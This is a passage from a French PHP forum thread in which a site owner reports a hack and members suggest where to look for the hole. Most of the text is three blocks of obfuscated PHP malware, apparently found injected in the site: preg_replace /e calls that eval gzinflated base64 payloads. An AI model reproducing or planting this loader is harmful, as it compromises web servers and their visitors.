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'\x29\x29\x29\x3B","");
    ?>
    <?php
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B","");
    ?>
    <?php
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lZfLiuRGEEX3Bv9D0/TC3gylfEo0/pPeSPUAgzE2xqZnvt6KGycqq2XTMIukKqV83Lhx46GX9+1yy+enpy+/PD2/vffTPtLbe6v76G/v9Tbm9q6d9zHtI/uzNO9jf5/2dem6j9X/6509P/tv3X/7vja3fdSHefdnH95PH+clP8z3s/J8WN8/nlcO+/NyOK8e3rdP7jviMbzlE3v+D9/R/uN5x/sez8sHfPlw/762HPn7DF/7733ftR/70o67776utn9/V/b/bUU/tn+CZ5ubf2Yf8s/idxjPfR/lso/i//viumu7lsrMf9NbgrfJ57an2rl2l/GbHZ9hybFnxffNz+mNZ5X9hnfyM9rGuILp5rbIvhX8xpPFQcXG6ue1wtj8joxdmtv5i5/Xbr7X7jPuSvL1NtKGH6rvFc/Z15kttsYwS+to3rAaBxaTugecxredZXGo/Tfj9/n1xx9e3uev02WNYLcN7cKBCNOIbpAm4SY/1Jwlh1USQvEgNzEYOHNMDoc3N9hAmlMMhDk8n9z5DSE3BNRYIweScETM7CKw+40gE0dBsEG0GZ/ZL6ILONZxr2HtYAvCbI3hkR2LC6fj5BZ28K5BemvDZuPF+LE1H7hL3Dn5Pdq34FBEXK6O1QRiOCR23snBcBQi1PryIIjFsZvoC3gksLPPzeE6qyHgKyK4Oi571h8ElOchQPko+CkEDfsVGCsBO7utCgR0JA4TY8Xe5jbYubJtdT9msBcKhhICdhT8oPll8G/7zOYaOgCncWdcSvyzY4oEoWRG0jQ8BTziC391OGlwKM0zL5tryn4VWHXgTDxreSS7DIfCkp07S0JWlLT/jAY3NLtSTBu+JXCVlK6uW/mBeBPGGXuL/ze8KlrETJ492H/P/dtf98qeHHCIzUhpyzhMQbO4I5VhFwJiRYyQamAzGTiH2BOkREZMZOoZR2UnQKAxsAFYxuN0ZeCJSlARKxnM3tkZBVHKSWRzw6kzLogJ0iSCmeoEXuNBzi9OtkS7joAoVDGJ/OJBo87nQvWITE+A5bA7gp4g0zrEK545J+FAYS78drgNUWW4o1JJRCf4o2PSvgiieXBmoigR+CuBNyGubQRdR+T2PhJtA3MhKZu9EuyJrqESIAs+jUTQHvxZWYePJXx8Kq4bSbLDzxmNbCNRFBJ7AaMSXRSmDofbqHzS72l0FAoI9su2BY5Og6+WHjrGBH/r6FxkG0VCCXilsEVnQdVuJKBCJxC2Nqp8JQGZvnIfMXCv3JwfZ3cScIuuirjNUfROb/cOyePHg/3Pv3/943YP9j6cEsY+kqNsH+AJ4J5GWyaDOi3QTCAiagkQYnofLZ8Rdm/fVp51n0ebrsCJZDENARueyh5l6wVy28CrCksGbVEJI4BntyeTdOo6qnululvQ1zwCX47vI0GoW2FE1m8kkIpN0RWZc4SvkCgfuEgRZFcC6cqzlcpWCapGdl8co/Bk7svcH9WWDiAqeyUJKvFsCDLaRqpktLSFQFYSovpE1VcbmsE/YU8EMHP5aCERY5P8zGehBM5+cUG7G52RKiEcNTirUaWjglLBe3Rw8Qla0eYCtjOFgUSjxJjwDRjFNcFx9+Myuo8Sn0CRHPpITupaE75bPNEoAWOHKjN25ot/Bn34NFq+Y06cPX4ma9jZ2/Pr9Z/1t59e+Dz/8hS9u/3zwm7/FPU/v/4L'\x29\x29\x29\x3B","");
    ?>

  2. #2
    Membre expert
    Avatar de Spartacusply
    Homme Profil pro
    Développeur Web
    Inscrit en
    Mai 2011
    Messages
    1 723
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Loire Atlantique (Pays de la Loire)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : Mai 2011
    Messages : 1 723
    Points : 3 274
    Points
    3 274
    Par défaut
    Sans le code, ça va être compliqué d'en identifier les failles...

    Assure toi déjà d'avoir fais attention aux principes de sécurité de base, en lisant ce tutoriel par exemple.
    Un message utile vous a aidé ? N'oubliez pas le

    www.simplifions.fr - Simplifier vos comptes entre amis !

  3. #3
    Candidat au Club
    Homme Profil pro
    Ingénieur développement logiciels
    Inscrit en
    Avril 2014
    Messages
    2
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 34
    Localisation : France, Rhône (Rhône Alpes)

    Informations professionnelles :
    Activité : Ingénieur développement logiciels
    Secteur : Bâtiment

    Informations forums :
    Inscription : Avril 2014
    Messages : 2
    Points : 2
    Points
    2
    Par défaut
    Tout d'abord merci d'avoir répondu !
    J'ai regardé le lien que tu m'as passé, j'ai bien respecté les préconisation qui sont données dans ce lien.

    Pour le code, je ne voit pas comment donner ça sans mettre sur le forum tout code du site.
    la page en question réalise juste une redirection :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    <?php 
    if(strrpos($_SERVER['HTTP_USER_AGENT'], 'iPhone')===false){
    	header('Location: /site/');
    }
    else
    	header('Location: /iphone/'); 
    ?>

  4. #4
    Membre émérite

    Profil pro
    Inscrit en
    Mai 2008
    Messages
    1 576
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2008
    Messages : 1 576
    Points : 2 440
    Points
    2 440
    Par défaut
    Sans la partie pertinente du code, personne ne pourra t'aider à détecter la faille. Le problème est que cette faille peut se trouver n'importe où. Regarde d'abord partout où tu reçois des saisies utilisateurs (tout ce qui se rapporte à $_GET, $_POST, les uploads de fichiers).

    Regarde dans tes répertoires s'il n'y a pas de fichiers php qui ne devraient pas y être. Regarde si le .htaccess n'a pas été modifié.

    La faille peut aussi provenir d'un autre script installé sur ton site et non mis à jour: Wordpress, phpmyadmin, etc ..

Discussions similaires

  1. Réponses: 0
    Dernier message: 30/09/2013, 16h18
  2. Injection javascript inconnue dans mon site (regarder le code)
    Par chrisdayton dans le forum Général JavaScript
    Réponses: 12
    Dernier message: 13/03/2010, 09h03
  3. Sécurité contre injection de code dans upload
    Par langevert dans le forum Langage
    Réponses: 3
    Dernier message: 11/12/2009, 00h24
  4. Sécurité des sites internet
    Par aloha dans le forum Dépannage et Assistance
    Réponses: 3
    Dernier message: 13/02/2006, 21h18
  5. [Sécurité] Verifier et securisé mon code
    Par istreen dans le forum Langage
    Réponses: 4
    Dernier message: 18/01/2006, 09h17

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo